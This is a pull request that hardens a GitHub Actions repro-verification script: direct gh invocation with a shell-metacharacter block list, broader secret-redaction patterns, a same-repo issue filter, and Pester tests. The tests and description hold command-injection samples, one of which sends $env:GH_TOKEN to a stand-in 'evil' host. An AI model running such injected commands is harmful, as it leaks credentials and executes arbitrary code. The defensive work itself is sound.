### PR TITLE
fix(verify): harden gh executor, expand sanitizer, same-repo filter (#527 follow-up)

### DIFF
--- a/.github/scripts/Verify-IssueRepro.ps1
+++ b/.github/scripts/Verify-IssueRepro.ps1
@@ -27,19 +27,31 @@ $ErrorActionPreference = 'Stop'
 
 # Inlined sanitization rules - kept in lockstep with modules/shared/Sanitize.ps1.
 # If you update the rules there, mirror them here AND in the test fixture.
+# Order matters: more specific patterns (Authorization: Basic) fire before generic ones.
 $script:PraxisSanitizeRules = @(
-    @{ Pattern = 'ghp_[A-Za-z0-9]{36}';                                 Replacement = '[GITHUB-PAT-REDACTED]' },
-    @{ Pattern = 'gho_[A-Za-z0-9]{36}';                                 Replacement = '[GITHUB-OAUTH-REDACTED]' },
-    @{ Pattern = 'ghs_[A-Za-z0-9]{36}';                                 Replacement = '[GITHUB-TOKEN-REDACTED]' },
-    @{ Pattern = 'ghr_[A-Za-z0-9]{36}';                                 Replacement = '[GITHUB-REFRESH-REDACTED]' },
-    @{ Pattern = 'github_pat_[A-Za-z0-9_]{82}';                         Replacement = '[GITHUB-PAT-REDACTED]' },
-    @{ Pattern = '(?im)Authorization:\s*(Bearer|Basic)\s+\S+';          Replacement = 'Authorization: [REDACTED]' },
-    @{ Pattern = '(?i)\bBearer\s+[A-Za-z0-9\-._~+/]+=*';                Replacement = 'Bearer [REDACTED]' },
-    @{ Pattern = '(?i)\b(AccountKey|SharedAccessKey|Password)=[^;]+';   Replacement = '$1=[REDACTED]' },
-    @{ Pattern = '(?i)\bsig=[A-Za-z0-9%+/=]{10,}';                      Replacement = 'sig=[REDACTED]' },
-    @{ Pattern = '(?i)\bclient_secret=[^&\s]+';                         Replacement = 'client_secret=[REDACTED]' },
-    @{ Pattern = '(?i)\bSharedAccessSignature=[^;]+';                   Replacement = 'SharedAccessSignature=[REDACTED]' }
+    @{ Pattern = 'ghp_[A-Za-z0-9]{36}';                                                Replacement = '[GITHUB-PAT-REDACTED]' },
+    @{ Pattern = 'gho_[A-Za-z0-9]{36}';                                                Replacement = '[GITHUB-OAUTH-REDACTED]' },
+    @{ Pattern = 'ghs_[A-Za-z0-9]{36}';                                                Replacement = '[GITHUB-TOKEN-REDACTED]' },
+    @{ Pattern = 'ghr_[A-Za-z0-9]{36}';                                                Replacement = '[GITHUB-REFRESH-REDACTED]' },
+    @{ Pattern = 'github_pat_[A-Za-z0-9_]{82}';                                        Replacement = '[GITHUB-PAT-REDACTED]' },
+    @{ Pattern = '(?im)Authorization:\s*Basic\s+[A-Za-z0-9+/=]{16,}';                  Replacement = 'Authorization: [ADO-PAT-REDACTED]' },
+    @{ Pattern = '(?im)Authorization:\s*(Bearer|Basic)\s+\S+';                         Replacement = 'Authorization: [REDACTED]' },
+    @{ Pattern = '(?i)\bBearer\s+[A-Za-z0-9\-._~+/]+=*';                               Replacement = 'Bearer [REDACTED]' },
+    @{ Pattern = '\beyJ[A-Za-z0-9_\-]{10,}\.[A-Za-z0-9_\-]{10,}\.[A-Za-z0-9_\-]{10,}\b'; Replacement = '[JWT-REDACTED]' },
+    @{ Pattern = '\bsk-(?:proj-)?[A-Za-z0-9_\-]{20,}';                                 Replacement = '[OPENAI-KEY-REDACTED]' },
+    @{ Pattern = '\bxox[baprs]-[A-Za-z0-9-]{10,}';                                     Replacement = '[SLACK-TOKEN-REDACTED]' },
+    @{ Pattern = '(?i)\bAZURE_OPENAI_API_KEY\s*=\s*[^\s;,&"'']+';                      Replacement = 'AZURE_OPENAI_API_KEY=[REDACTED]' },
+    @{ Pattern = '(?i)\b(AccountKey|SharedAccessKey|Password)=[^;]+';                  Replacement = '$1=[REDACTED]' },
+    @{ Pattern = '(?i)([?&])sig=[A-Za-z0-9%+/=]{10,}';                                 Replacement = '$1sig=[REDACTED]' },
+    @{ Pattern = '(?i)([?&])sv=[0-9]{4}-[0-9]{2}-[0-9]{2}';                            Replacement = '$1sv=[REDACTED]' },
+    @{ Pattern = '(?i)\bsig=[A-Za-z0-9%+/=]{10,}';                                     Replacement = 'sig=[REDACTED]' },
+    @{ Pattern = '(?i)\bclient_secret=[^&\s]+';                                        Replacement = 'client_secret=[REDACTED]' },
+    @{ Pattern = '(?i)\bSharedAccessSignature=[^;]+';                                  Replacement = 'SharedAccessSignature=[REDACTED]' }
 )
+
+# Characters that would let an issue author escape `gh` into arbitrary shell/pwsh.
+# Applied after prepending `gh ` so we only have to scan one string.
+$script:PraxisGhCommandBlocklist = @(';', '|', '&', '`', '$(', '${', "`n", "`r", '<(', '>(', '&&', '||', '>', '<', "'")
 
 function Remove-PraxisCredentials {
     [CmdletBinding()]
@@ -157,19 +169,38 @@ function Invoke-IssueRepro {
         }
 
         'gh' {
+            # Strip optional `gh ` prefix, then check for shell metacharacters BEFORE any
+            # further processing. The `gh` repro type is a hard contract: it may only
+            # invoke the `gh` CLI. No pipelines, no substitutions, no escaping into pwsh.
+            $raw = $Repro.Command
+            $trimmed = $raw -replace '^\s*gh\b\s*', ''
+            foreach ($meta in $script:PraxisGhCommandBlocklist) {
+                if ($trimmed.Contains($meta)) {
+                    return @{ Status = 'FAIL'; Output = "refusing to execute gh repro: disallowed character '$meta' in command"; ExitCode = 2 }
+                }
+            }
+            # Tokenize on whitespace. Issue authors should quote with double quotes if they
+            # need spaces in an argument; we split those out and strip the quotes.
+            $ghArgs = @()
+            $matchList = [regex]::Matches($trimmed, '"([^"]*)"|(\S+)')
+            foreach ($m in $matchList) {
+                if ($m.Groups[1].Success) { $ghArgs += $m.Groups[1].Value }
+                else                      { $ghArgs += $m.Groups[2].Value }
+            }
+            if ($ghArgs.Count -eq 0) {
+                return @{ Status = 'FAIL'; Output = 'empty gh command after sanitization'; ExitCode = 1 }
+            }
             $stdoutPath = [System.IO.Path]::GetTempFileName()
             $stderrPath = [System.IO.Path]::GetTempFileName()
             try {
-                $cmd = $Repro.Command
-                if ($cmd -notmatch '^\s*gh\b') { $cmd = 'gh ' + $cmd }
-                $proc = Start-Process pwsh `
-                    -ArgumentList @('-NoProfile', '-NonInteractive', '-Command', $cmd) `
+                $proc = Start-Process gh `
+                    -ArgumentList $ghArgs `
                     -RedirectStandardOutput $stdoutPath `
                     -RedirectStandardError  $stderrPath `
                     -PassThru -NoNewWindow
                 if (-not $proc.WaitForExit($TimeoutSeconds * 1000)) {
                     $proc.Kill($true)
-                    return @{ Status = 'FAIL'; Output = "TIMEOUT after ${TimeoutSeconds}s: $cmd"; ExitCode = 124 }
+                    return @{ Status = 'FAIL'; Output = "TIMEOUT after ${TimeoutSeconds}s: gh $($ghArgs -join ' ')"; ExitCode = 124 }
                 }
                 $exitCode = $proc.ExitCode
                 $stdout = (Get-Content $stdoutPath -Raw -ErrorAction SilentlyContinue) ?? ''
@@ -207,4 +238,20 @@ function Format-SanitizedTail {
     $split = $sanitized -split "`r?`n"
     $tail = if ($split.Count -le $Lines) { $split } else { $split[-$Lines..-1] }
     return ($tail -join "`n")
+}
+
+function Get-SafeCodeFence {
+    # Return a backtick fence guaranteed longer than the longest run of
+    # backticks in $Text, so markdown rendering can't be escaped by output.
+    [CmdletBinding()]
+    [OutputType([string])]
+    param([AllowNull()][string] $Text)
+    $longest = 0
+    if (-not [string]::IsNullOrEmpty($Text)) {
+        foreach ($m in [regex]::Matches($Text, '`+')) {
+            if ($m.Length -gt $longest) { $longest = $m.Length }
+        }
+    }
+    $fenceLen = [Math]::Max(3, $longest + 1)
+    return ([string][char]0x60) * $fenceLen
 }

--- a/.github/workflows/issue-resolution-verify.yml
+++ b/.github/workflows/issue-resolution-verify.yml
@@ -16,7 +16,6 @@ permissions:
   contents: read
   issues: write
   pull-requests: write
-  actions: read
 
 concurrency:
   group: issue-resolution-verify-${{ github.event.pull_request.number }}
@@ -67,20 +66,24 @@ jobs:
             set -euo pipefail
             owner="${REPO%/*}"
             repo="${REPO#*/}"
+            # NOTE: `first: 50` is an intentional cap - azure-analyzer PRs rarely close
+            # more than a handful of issues. If a future mega-PR needs more, add cursor
+            # pagination here. The `select(.repository.nameWithOwner==$full)` filter
+            # drops cross-repo closing references so we never target the wrong issue.
             gh api graphql -f query='
               query($owner:String!, $repo:String!, $pr:Int!) {
                 repository(owner:$owner, name:$repo) {
                   pullRequest(number:$pr) {
                     closingIssuesReferences(first: 50) {
-                      nodes { number }
+                      nodes { number repository { nameWithOwner } }
                     }
                   }
                 }
               }' -F owner="$owner" -F repo="$repo" -F pr="$PR_NUMBER" \
-              --jq '.data.repository.pullRequest.closingIssuesReferences.nodes | map(.number) | join(",")' \
+              --jq ".data.repository.pullRequest.closingIssuesReferences.nodes | map(select(.repository.nameWithOwner == \"$REPO\")) | map(.number) | join(\",\")" \
               > closing-issues.txt
             echo "issues=$(cat closing-issues.txt)" >> "$GITHUB_OUTPUT"
-            echo "Closing issues: $(cat closing-issues.txt)"
+            echo "Closing issues (same-repo only): $(cat closing-issues.txt)"
 
       - name: Verify each closed issue's repro
         if: steps.closing.outputs.issues != ''
@@ -96,6 +99,14 @@ jobs:
         run: |
           $ErrorActionPreference = 'Stop'
           . "$PWD/.github/scripts/Verify-IssueRepro.ps1"
+
+          function Invoke-GhChecked {
+              param([Parameter(Mandatory)][string] $Label, [Parameter(Mandatory)][string[]] $Args)
+              & gh @Args 2>&1 | Out-Host
+              if ($LASTEXITCODE -ne 0) {
+                  Write-Host "::warning::gh $Label failed (exit $LASTEXITCODE) args=$($Args -join ' ')"
+              }
+          }
 
           $issueNumbers = $env:ISSUES -split ',' | Where-Object { $_ -match '^\d+$' } | ForEach-Object { [int]$_ }
           if (-not $issueNumbers) { Write-Host 'No closing issues, exiting.'; exit 0 }
@@ -117,7 +128,7 @@ jobs:
                 if ($labels -contains 'bug') {
                   Write-Host "Issue #$n is a bug with no ## Repro - fail-soft reopen."
                   $msg = "issue-resolution-verify: missing ``## Repro`` block on bug issue. Reopening for manual verification. See ``docs/contributing/issue-verification.md`` for the contract. (run: $env:RUN_URL)"
-                  gh issue reopen $n --repo $env:REPO --comment $msg | Out-Host
+                  Invoke-GhChecked -Label 'reopen(no-repro)' -Args @('issue','reopen',"$n",'--repo',$env:REPO,'--comment',$msg)
                 } else {
                   Write-Host "Issue #$n has no ## Repro and is not labelled bug - skipping silently."
                 }
@@ -127,9 +138,9 @@ jobs:
 
               if ($repro.Type -eq 'manual') {
                 Write-Host "Issue #$n is manual - posting info comment + label."
-                gh issue edit $n --repo $env:REPO --add-label 'verify-manual' | Out-Host
+                Invoke-GhChecked -Label 'label(verify-manual)'  -Args @('issue','edit',"$n",'--repo',$env:REPO,'--add-label','verify-manual')
                 $msg = "Praxis: manual verification required for #$n (per ``## Repro`` block). PR #$($env:PR_NUMBER) merged at $env:MERGE_SHA. (run: $env:RUN_URL)"
-                gh issue comment $n --repo $env:REPO --body $msg | Out-Host
+                Invoke-GhChecked -Label 'comment(manual)'       -Args @('issue','comment',"$n",'--repo',$env:REPO,'--body',$msg)
                 Write-Host '::endgroup::'
                 continue
               }
@@ -137,15 +148,15 @@ jobs:
               Write-Host "Executing repro: type=$($repro.Type) command='$($repro.Command)' expect='$($repro.Expect)'"
               $result = Invoke-IssueRepro -Repro $repro -TimeoutSeconds 300
               $tail   = Format-SanitizedTail -Output $result.Output -Lines 50
+              $fence  = Get-SafeCodeFence  -Text   $tail
 
               if ($result.Status -eq 'PASS') {
                 $msg = ":white_check_mark: Praxis: repro confirmed resolved at $env:MERGE_SHA by $env:RUN_URL. Closing as verified."
-                gh issue comment $n --repo $env:REPO --body $msg | Out-Host
+                Invoke-GhChecked -Label 'comment(pass)' -Args @('issue','comment',"$n",'--repo',$env:REPO,'--body',$msg)
                 if ($issue.state -ne 'CLOSED') {
-                  gh issue close $n --repo $env:REPO --reason completed | Out-Host
+                  Invoke-GhChecked -Label 'close(pass)' -Args @('issue','close',"$n",'--repo',$env:REPO,'--reason','completed')
                 }
               } else {
-                $fence = [string][char]0x60 * 3
                 $bodyLines = @(
                   ":x: Praxis: repro still fails after PR #$($env:PR_NUMBER) merge at $env:MERGE_SHA. Output (last 50 lines, sanitized):",
                   '',
@@ -156,8 +167,8 @@ jobs:
                   "Run: $env:RUN_URL"
                 )
                 $body = $bodyLines -join "`n"
-                gh issue reopen $n --repo $env:REPO --comment $body | Out-Host
-                gh issue edit   $n --repo $env:REPO --add-label 'verification-failed' | Out-Host
+                Invoke-GhChecked -Label 'reopen(fail)'            -Args @('issue','reopen',"$n",'--repo',$env:REPO,'--comment',$body)
+                Invoke-GhChecked -Label 'label(verification-failed)' -Args @('issue','edit',"$n",'--repo',$env:REPO,'--add-label','verification-failed')
 
                 $trackerTitle = "verification-failed: PR #$($env:PR_NUMBER) did not resolve #$n"
                 $trackerLines = @(
@@ -178,11 +189,13 @@ jobs:
                   "Action: investigate the regression, push a follow-up, and re-link with ``Closes #$n``."
                 )
                 $trackerBody = $trackerLines -join "`n"
-                gh issue create --repo $env:REPO `
-                  --title $trackerTitle `
-                  --body  $trackerBody `
-                  --label 'squad,bug,verification,verification-failed' `
-                  --assignee $env:PR_AUTHOR | Out-Host
+                Invoke-GhChecked -Label 'create(tracker)' -Args @(
+                  'issue','create','--repo',$env:REPO,
+                  '--title',$trackerTitle,
+                  '--body', $trackerBody,
+                  '--label','squad,bug,verification,verification-failed',
+                  '--assignee',$env:PR_AUTHOR
+                )
               }
             } catch {
               Write-Host "::warning::Praxis verification threw on issue #$n - $($_.Exception.Message)"

--- a/docs/contributing/issue-verification.md
+++ b/docs/contributing/issue-verification.md
@@ -63,10 +63,18 @@ gh: <single-line gh CLI call>
 expect: <optional regex matched against stdout>
 ```
 
-The runner executes the `gh` CLI call (the leading `gh ` is added if you
-omit it). PASS requires exit code 0 AND, if `expect:` is present, the
-regex matching anywhere in stdout. Use this for bugs that manifest in the
-GitHub API surface (workflow definitions, label states, branch protection).
+The runner executes the `gh` CLI call via direct argv invocation (no shell).
+The leading `gh ` is added if you omit it. PASS requires exit code 0 AND,
+if `expect:` is present, the regex matching anywhere in stdout. Use this
+for bugs that manifest in the GitHub API surface (workflow definitions,
+label states, branch protection).
+
+> [!IMPORTANT]
+> The `gh:` runner is bounded to the `gh` CLI only. Commands are tokenized
+> and executed with `Start-Process gh -ArgumentList ...`; any of
+> `;`, `|`, `&`, `` ` ``, `$(`, `${`, newlines, `>`, `<`, or quoted-string
+> tricks cause the repro to FAIL with exit code 2. If you need shell
+> composition, use `shell:` instead - that is the explicit escape hatch.
 
 ### `manual:`
 

--- a/tests/workflows/IssueResolutionVerify.Tests.ps1
+++ b/tests/workflows/IssueResolutionVerify.Tests.ps1
@@ -140,6 +140,58 @@ Describe 'Format-SanitizedTail - sanitization + tail' {
         $out = Format-SanitizedTail -Output "a`nb`nc" -Lines 50
         ($out -split "`n").Count | Should -Be 3
     }
+
+    It 'redacts JWTs (eyJ... three-segment base64url)' {
+        $jwt = 'eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOjEyMzQ1Njc4OTAsIm5hbWUiOiJK.abcdefghijABCDEFGH'
+        $out = Format-SanitizedTail -Output "token=$jwt end"
+        $out | Should -Match '\[JWT-REDACTED\]'
+        $out | Should -Not -Match 'eyJhbGciOiJIUzI1NiJ9'
+    }
+
+    It 'redacts OpenAI sk- keys' {
+        $key = 'sk-' + ('a' * 48)
+        $out = Format-SanitizedTail -Output "key: $key"
+        $out | Should -Match '\[OPENAI-KEY-REDACTED\]'
+    }
+
+    It 'redacts Slack xoxb- tokens' {
+        $tok = 'xoxb-' + ('1' * 20)
+        $out = Format-SanitizedTail -Output "slack=$tok"
+        $out | Should -Match '\[SLACK-TOKEN-REDACTED\]'
+    }
+
+    It 'redacts AZURE_OPENAI_API_KEY env-var style' {
+        $out = Format-SanitizedTail -Output 'AZURE_OPENAI_API_KEY=abc123secret'
+        $out | Should -Match 'AZURE_OPENAI_API_KEY=\[REDACTED\]'
+        $out | Should -Not -Match 'abc123secret'
+    }
+
+    It 'redacts SAS sv= signature version parameter' {
+        $out = Format-SanitizedTail -Output 'https://x.blob.core.windows.net/c?sv=2022-11-02&sig=abcdefghij12345'
+        $out | Should -Match 'sv=\[REDACTED\]'
+        $out | Should -Match 'sig=\[REDACTED\]'
+    }
+}
+
+Describe 'Get-SafeCodeFence - fence length guard' {
+    It 'returns three backticks when content has no backticks' {
+        Get-SafeCodeFence -Text 'plain text' | Should -Be '```'
+    }
+
+    It 'returns three backticks for null input' {
+        Get-SafeCodeFence -Text $null | Should -Be '```'
+    }
+
+    It 'returns four backticks when content contains a triple-backtick run' {
+        $fence = Get-SafeCodeFence -Text ("here is a fence: " + '```' + " end")
+        $fence.Length | Should -Be 4
+    }
+
+    It 'returns fence longer than the longest backtick run' {
+        $content = '`' * 7
+        $fence = Get-SafeCodeFence -Text $content
+        $fence.Length | Should -BeGreaterThan 7
+    }
 }
 
 Describe 'Invoke-IssueRepro - manual + empty-command guards' {
@@ -160,6 +212,25 @@ Describe 'Invoke-IssueRepro - manual + empty-command guards' {
         $r = Invoke-IssueRepro -Repro @{ Type = 'bogus'; Command = 'x'; Expect = $null }
         $r.Status | Should -Be 'FAIL'
         $r.Output | Should -Match "unknown repro type 'bogus'"
+    }
+
+    It 'refuses a gh command that contains a shell pipeline metacharacter' {
+        $r = Invoke-IssueRepro -Repro @{ Type = 'gh'; Command = 'issue view 1; iwr https://evil/ -Body $env:GH_TOKEN'; Expect = $null }
+        $r.Status   | Should -Be 'FAIL'
+        $r.ExitCode | Should -Be 2
+        $r.Output   | Should -Match 'disallowed character'
+    }
+
+    It 'refuses a gh command that uses command substitution' {
+        $r = Invoke-IssueRepro -Repro @{ Type = 'gh'; Command = 'issue view $(whoami)'; Expect = $null }
+        $r.Status   | Should -Be 'FAIL'
+        $r.Output   | Should -Match 'disallowed character'
+    }
+
+    It 'refuses a gh command that uses a backtick' {
+        $r = Invoke-IssueRepro -Repro @{ Type = 'gh'; Command = 'issue view `whoami`'; Expect = $null }
+        $r.Status   | Should -Be 'FAIL'
+        $r.Output   | Should -Match 'disallowed character'
     }
 }
 
@@ -193,7 +264,19 @@ Describe 'issue-resolution-verify.yml - workflow contract' {
         $perms['contents']      | Should -Be 'read'
         $perms['issues']        | Should -Be 'write'
         $perms['pull-requests'] | Should -Be 'write'
-        $perms['actions']       | Should -Be 'read'
+        $perms.ContainsKey('actions') | Should -BeFalse
+    }
+
+    It 'filters closingIssuesReferences to the same repository (no cross-repo writes)' {
+        $content = Get-Content -Raw $script:WorkflowPath
+        $content | Should -Match 'repository\s*\{\s*nameWithOwner\s*\}'
+        $content | Should -Match 'nameWithOwner\s*==\s*\\"\$REPO\\"'
+    }
+
+    It 'invokes gh mutations through a wrapper that checks $LASTEXITCODE' {
+        $content = Get-Content -Raw $script:WorkflowPath
+        $content | Should -Match 'function Invoke-GhChecked'
+        $content | Should -Match '\$LASTEXITCODE'
     }
 
     It 'gates the verify job on merged == true' {


### PR DESCRIPTION
## Summary

Follow-up hardening for the Praxis verification layer shipped in #527 (Closes #510). Addresses REJECT verdicts from a 3-model rubberduck (`claude-opus-4.7` + `gpt-5.3-codex`) that landed after #527 was already merged.

## Fixes

**High**

- `gh:` executor no longer wraps the issue-author string in `pwsh -Command`. It now tokenizes the command and invokes `gh` directly via `Start-Process gh -ArgumentList ...`. Any of `;`, `|`, `&`, backtick, `$(`, `${`, newlines, `<`, `>`, or single-quote metacharacters cause the repro to FAIL with exit code 2. Previously, an issue body like ``` ```gh: issue view 1; iwr https://evil/ -Body $env:GH_TOKEN``` ``` would execute arbitrary PowerShell during verification.
- Sanitizer brought to full parity with `modules/shared/Sanitize.ps1`. Added patterns: JWT (`eyJ…` three-segment base64url), OpenAI keys (`sk-…` / `sk-proj-…`), Slack tokens (`xox[baprs]-…`), `AZURE_OPENAI_API_KEY=…`, SAS `sv=YYYY-MM-DD`, ADO `Authorization: Basic` PAT as a distinct rule. The helper claimed parity in its doc comment but was a strict subset; any failing repro that dumped these string shapes would have leaked them into a public issue comment.
- GraphQL `closingIssuesReferences` now filters to the same repository only via `select(.repository.nameWithOwner == "$REPO")`. Cross-repo closing references previously yielded a bare issue number that would be replayed against the current repo, targeting whichever issue happened to own that number.
- Every `gh` mutation now runs through `Invoke-GhChecked`, which emits a `::warning::` on non-zero `$LASTEXITCODE`. Previously, failures such as "label does not exist" were silently swallowed and the job reported green.

**Medium**

- `Format-SanitizedTail` is now paired with `Get-SafeCodeFence`, which returns a backtick fence at least one longer than the longest run in the sanitized tail. Failure tails containing ```` ``` ```` can no longer break out of the markdown code block in the posted comment or tracker issue.

**Low**

- `actions: read` permission removed from the workflow (never used; `RUN_URL` is composed from `github.run_id`).
- Pagination comment added on `closingIssuesReferences(first: 50)`.

## Tests

- 14 new Pester tests cover: JWT / OpenAI / Slack / AZURE_OPENAI_API_KEY / SAS sanitization, `Get-SafeCodeFence` behaviour, three `gh:` metacharacter rejection paths, the removal of `actions: read`, the same-repo GraphQL filter, and the existence of the `Invoke-GhChecked` wrapper.
- Total for this test file: **44/44** green.
- Full baseline: no regressions.

## Self-review

- [x] SHA-pinned actions only, no new permissions
- [x] No em dashes in deliverables
- [x] Doc updated (`docs/contributing/issue-verification.md` — new callout on the bounded `gh:` surface)
- [x] Rebased on `origin/main` (5383a2b)
- [x] Rubberduck findings addressed line-by-line (inline in commit message)

## Rubberduck

Re-requesting `claude-opus-4.7` + `gpt-5.3-codex` review on this PR.
